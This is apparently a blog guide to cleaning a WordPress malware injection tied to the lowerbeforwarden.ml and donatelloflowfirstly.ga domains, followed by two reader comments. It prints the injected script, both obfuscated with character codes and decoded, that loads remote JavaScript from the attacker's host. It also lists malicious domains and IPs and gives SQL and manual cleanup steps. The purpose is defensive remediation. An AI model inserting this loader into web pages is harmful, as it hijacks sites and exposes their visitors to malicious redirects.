scripts.lowerbeforwarden.ml is never Version of js.donatelloflowfirstly. ga virus and it is infecting all those site who are unable to fix back door yet
js.donatelloflowfirstly.ga is very savior Malware Inject types of virus and thousands of WordPress sites are infected with this virus
This guide is now old, check out a new one here
Index
How to Check For scripts.lowerbeforwarden.ml
How to Check For location.lowerbeforwarden.ml
if your site redirects visitors to some ugly looking webpages this virus may exist in your site
you might find following scripts embedded in your site every where
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
or
<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
yes that is one the scripts that this virus is inserting
and here is
encrypted version of scripts.lowerbeforwarden.ml virus script
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>
Here is Decoded script
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(script); elem.type = text/javascript elem.src = https://scripts.lowerbeforwarden.ml/src.jselem.appendAfter(document.getElementsByTagName(script)[0]);elem.appendAfter(document.getElementsByTagName(head)[0]);document.getElementsByTagName(head)[0].appendChild(elem);})();</script></head>
How to clean scripts.lowerbeforwarden.ml virus
Create a backup of your whole site including Database before changing any code
- first, Delete _a or _f or _2 etc ……. file from your sites home dedicatory
2. Delete if you spot any malicious code Mu-Plugins Folder
Check all the files under wp-content/mu-plugins and see for any suspicious file and delete them. While working for a user in cleaning this vulnerability I see that he was using nulled WordPress plugins. Because of adding additional functionality in the nulled plugin rms-script-ini.php function creates another file under wp-content/mu-plugins ie; rms_unique_wp_mu_pl_fl_nm.php, which creates a communication channel between hacker site and your website. By completing this step you had cleaned up remaining traces of vulnerability.

Goto PHPmyadmin. Click on Database and run the following SQL query to remove scripts from Wp_Posts tables

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));
or
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));
If You want any more help to remove this virus you can mail me [email protected]
Clean Core Files
There are many ways to clean your wordpress files. Here is my way:
1): Zip all the site files and download the zip file to desktop.
2): Unzip the files to the folder, ” txnkaro” as an example.
3): Located to the folder wp-content / plugins , and delete all plugins. Then replace with the clean plugins into the folder. Same with themes files, delete all themes and replace with clean themes.
4): Now run the VSCode editor, you can download it at: https://code.visualstudio.com/ and install it.
5): Open the txnkaro (example) folder via VSCode, then click Edit > Search in the files to search the keywords: donatelloflowfirstly, lowerbeforwarden. There should be only a few files been found since we have deleted all Cached Files and replaced all Themes and Plugins. Edit those files if you know how to or just replace them with clean files.
6): All files should be clean now. Delete your whole site, and upload this clean backup to the site folder. Your site should be OK.
There is another way to clean the file if you can login to site admin panel. Install Wordfence plugin and scan the whole stie. The Wordfence will find out those injected files, just edit them or replace them with clean files.
Now clean Your website cache files and your your browser cache and check virus should gone
If You are looking For Some One Professional who can Help to remove viruses permanently from your website check out my gig on fiverr
List of malicious URLs:
js.donatelloflowfirstly.ga/stats.js
detect.donatelloflowfirstly.ga
go.donatelloflowfirstly.ga/go.php?1=1
go.donatelloflowfirstly.ga/do.php?follow=1&re=5&id=163
blackwaterforllows.ga/?p=gfqtqojrmu5gi3bpgiydknq
developerstatss.ga
bestprize-places-here1.life/?u=8hkk605&o=45y8yn8
hxxps://blackwaterforllows.ga/w_14.js
hxxps://winworker.club/sw/w_11.js
amastybootstrap.host
amastybootstrap.online
amastybootstrap.store
bootstrapcd.online
bootstrapcss.ost
bootstrapcss.online
dbbootstrap.online
Other malicious domains within the same network:
tomog.pro, mysbitl.com, nwliko.com, tbtrck.com, bestprize-places-here1.life, mobile-global-apps-store.life, mobile-global-apps-store.life, beawickcampaing.ga, bluemountainreserve.ga, blackwaterforllows.ga, check-you-robot.site, superinterestinginfo.info,
allow-space.com, allowandgo.com, check-you-robot.online, check-you-robot.site, checkandgo.info, clckask.club, clickjump.biz, clickpush.biz, traffsend.me, reclick.club, pumesh.xyz, clicktms.club, wwopenclick.club.
clickgate.biz, clickworker.me, wwclickads.club, wwclicktm.club, wwclicktm.club, clickworker.me
Malicious IPs: 45.9.148.126, 157.245.79.75.
Thanks for the info. One thing this virus do is that wp-login.php and wp-admin show a 500 error. I got my website fixed but I can’t log in.
Thank you for this article. It was very helpful in resolving my issue with scripts.lowerbeforwarden.ml. I had to check my wp_posts to get the syntax of the script as my script was slightly different than you version.